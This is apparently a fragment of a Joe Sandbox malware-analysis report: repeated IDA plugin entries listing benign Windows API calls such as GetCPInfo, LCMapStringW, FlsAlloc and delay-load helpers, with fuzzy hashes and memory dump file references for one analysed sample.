                                                                                                                                    • Opcode Fuzzy Hash: 86c07ad34b9c786b3b5b2dbaa7ab2922ec5dcdcd5309fef30e1c5a8dc1fe1954
                                                                                                                                    • Instruction Fuzzy Hash: 5701D839100A106AEF23AB754C49BFE775CAF09780F14C415F902F6299D754CA81CEB6
                                                                                                                                    APIs
                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0038B8B8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Info
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                    • Opcode ID: 209060d9d4264143f1261b75fa61a219461b45db68d9058aae3d6d9cd9da4203
                                                                                                                                    • Instruction ID: 1e8ce6d83912723e40514325ee06ca16f00b0c670fac131bb9605746dd627ec4
                                                                                                                                    • Opcode Fuzzy Hash: 209060d9d4264143f1261b75fa61a219461b45db68d9058aae3d6d9cd9da4203
                                                                                                                                    • Instruction Fuzzy Hash: 2E41F57050438D9FDB239E688C84BE6FBADEB45304F1404EDE69AC6242D335AA458F60
                                                                                                                                    APIs
                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0038AFDD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String
                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                    • Opcode ID: ecb210d873d19454d055ec17c7fc5bef577d1631a788652c9275f5beece13dbf
                                                                                                                                    • Instruction ID: 16c378bc9ea4b2a8b50c0580d85da06b4b4faa550ac5203d0af4c5dbc1a91d85
                                                                                                                                    • Opcode Fuzzy Hash: ecb210d873d19454d055ec17c7fc5bef577d1631a788652c9275f5beece13dbf
                                                                                                                                    • Instruction Fuzzy Hash: 4C01E572504219BBDF13AF90DC06DEE7F66EF09750F054156FE186A160CB368A31AB91
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0038A56F), ref: 0038AF55
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                                    • Opcode ID: 9031481960a7ddda2228c16f65e870288dc1da20233bdd2c68a9d870ff67f0b6
                                                                                                                                    • Instruction ID: 0d5692a7007806106bfafd5184417f064221c224caf3af2deaccd48c7553700c
                                                                                                                                    • Opcode Fuzzy Hash: 9031481960a7ddda2228c16f65e870288dc1da20233bdd2c68a9d870ff67f0b6
                                                                                                                                    • Instruction Fuzzy Hash: A2F0E971645208BFDF176F55CC02C9E7F65EF04711F404096FD099A260DB725E109B8A
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Alloc
                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                                    • Opcode ID: a5f3c9917067356a89b227854801f57034b4909ce175ea73dbbd0add16f068e3
                                                                                                                                    • Instruction ID: 810f9c1405f9ecbdf1bc7d0fcdc14378f469571fde1db9fffa9f06ab3ffbe23f
                                                                                                                                    • Opcode Fuzzy Hash: a5f3c9917067356a89b227854801f57034b4909ce175ea73dbbd0add16f068e3
                                                                                                                                    • Instruction Fuzzy Hash: ECE0E5716453187BDA13BB65DC129AEBB68DB04721F01019BF805A7290DE725E0087DA
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: ec8a97e56791c23a6edbbdb5db5cc4991a656fc37747ff8af1d0ec10ecefa965
                                                                                                                                    • Instruction ID: 04c905a5084346709a6b56c718675343d2da1ec35115bfbdd144735f725633f6
                                                                                                                                    • Opcode Fuzzy Hash: ec8a97e56791c23a6edbbdb5db5cc4991a656fc37747ff8af1d0ec10ecefa965
                                                                                                                                    • Instruction Fuzzy Hash: 92B012D5268000BC3217F2465C03E37010CC5CAF10330C07FFC2DC5680D844AC040532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: c9c59e3387782db638b979a511a69470793a6755391f32b4882f1894cf5d3384
                                                                                                                                    • Instruction ID: 59e1fb83b4f69a4c5114f00aa75f15dff29b6fa63859c090917c9148c44ac4d0
                                                                                                                                    • Opcode Fuzzy Hash: c9c59e3387782db638b979a511a69470793a6755391f32b4882f1894cf5d3384
                                                                                                                                    • Instruction Fuzzy Hash: E2B012D92AC100BC3217E18A5C03E77011CC1C9F10330C07EF82DC5480D8446C000632
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 64676ccb729ecd176355b4a11b6a4ff8a298ad955896f3315ef63a0cd94b0809
                                                                                                                                    • Instruction ID: bebc4bbc424628a5915c9e1aab729a6abe3e771f00f98417f2a9b99cbeebba6f
                                                                                                                                    • Opcode Fuzzy Hash: 64676ccb729ecd176355b4a11b6a4ff8a298ad955896f3315ef63a0cd94b0809
                                                                                                                                    • Instruction Fuzzy Hash: 77B012D92A8100BC3217B1865C03D37011CC1CAF10330C47EFC29D4880D844AC000432
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: f943f165fa695314d27e62daa51d25196932e6a5e8a0c83d5ae699b6147c73fd
                                                                                                                                    • Instruction ID: 6b3531876b771359fa0777813345a643f316a81e8f8311e74bde98e97b18693d
                                                                                                                                    • Opcode Fuzzy Hash: f943f165fa695314d27e62daa51d25196932e6a5e8a0c83d5ae699b6147c73fd
                                                                                                                                    • Instruction Fuzzy Hash: CFB012E5268000BC3217E1475D03E37010CC1C9F10330C07EF82DC5480DC446E010532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: bf60f462b81f46c417913718b1e64d7fc7f897ca1a09fd3956d020b6b7a08772
                                                                                                                                    • Instruction ID: 8d4d1463e9f7f06351a67ed05e6c72ceb2a1c901d4c2a13da5d6de9051315496
                                                                                                                                    • Opcode Fuzzy Hash: bf60f462b81f46c417913718b1e64d7fc7f897ca1a09fd3956d020b6b7a08772
                                                                                                                                    • Instruction Fuzzy Hash: 1EB012E5268000BC3217E1475C03E77010CC1C9F10330C07EF82DC5480D8446D000532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 4aa36f6336a719b3a3703c2c0cb7a668db7ea8d419656b254f7b9fbe7164cf1a
                                                                                                                                    • Instruction ID: 14dab3c13cc615f3de776d6957ec526657e0510d8a74005405ec1e48f8b45272
                                                                                                                                    • Opcode Fuzzy Hash: 4aa36f6336a719b3a3703c2c0cb7a668db7ea8d419656b254f7b9fbe7164cf1a
                                                                                                                                    • Instruction Fuzzy Hash: 49B012E5268100BC3257E1465C03E37010CC1C9F10330C17EF82DC5480D8446D400532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: ce305c7b769c6e9e1b025e19aaecca43697a2039478ff71ec0604aab953ff941
                                                                                                                                    • Instruction ID: fd1595737e3422cc01d45708be95563ebd62b922b26bf2213e7e248fd6b2ffa9
                                                                                                                                    • Opcode Fuzzy Hash: ce305c7b769c6e9e1b025e19aaecca43697a2039478ff71ec0604aab953ff941
                                                                                                                                    • Instruction Fuzzy Hash: 67B012E6268000BC3217F1465C03E37010CC1CAF10330C07EFC2DC5480D844AD000532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 1f9bbc204fec9aac4e3fdf90d70473bd99d489379b0f616cf198173fab41257c
                                                                                                                                    • Instruction ID: 50e6aba53d22dd0b01554b9d5c7cface5568bb1468395fcfc6c1be57f9631c2d
                                                                                                                                    • Opcode Fuzzy Hash: 1f9bbc204fec9aac4e3fdf90d70473bd99d489379b0f616cf198173fab41257c
                                                                                                                                    • Instruction Fuzzy Hash: 94B012D5368140BC3257F2465C03E37010CC5C9F10330C17EF82DC5680D8446C440532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID: 7
                                                                                                                                    • API String ID: 1269201914-626684421
                                                                                                                                    • Opcode ID: 78a675b3c98079984f147e7dce60b784472362251170cd700b3897f5d2695ed8
                                                                                                                                    • Instruction ID: 729be0c4b45bb967abb4285b6f2bd892adfbcd5385d875275535c6214e147c80
                                                                                                                                    • Opcode Fuzzy Hash: 78a675b3c98079984f147e7dce60b784472362251170cd700b3897f5d2695ed8
                                                                                                                                    • Instruction Fuzzy Hash: 6FB012D5268000BC3217F2475D03E37010CC5C9F10330C07EF82DC5680DC546D091532
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E1E3
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
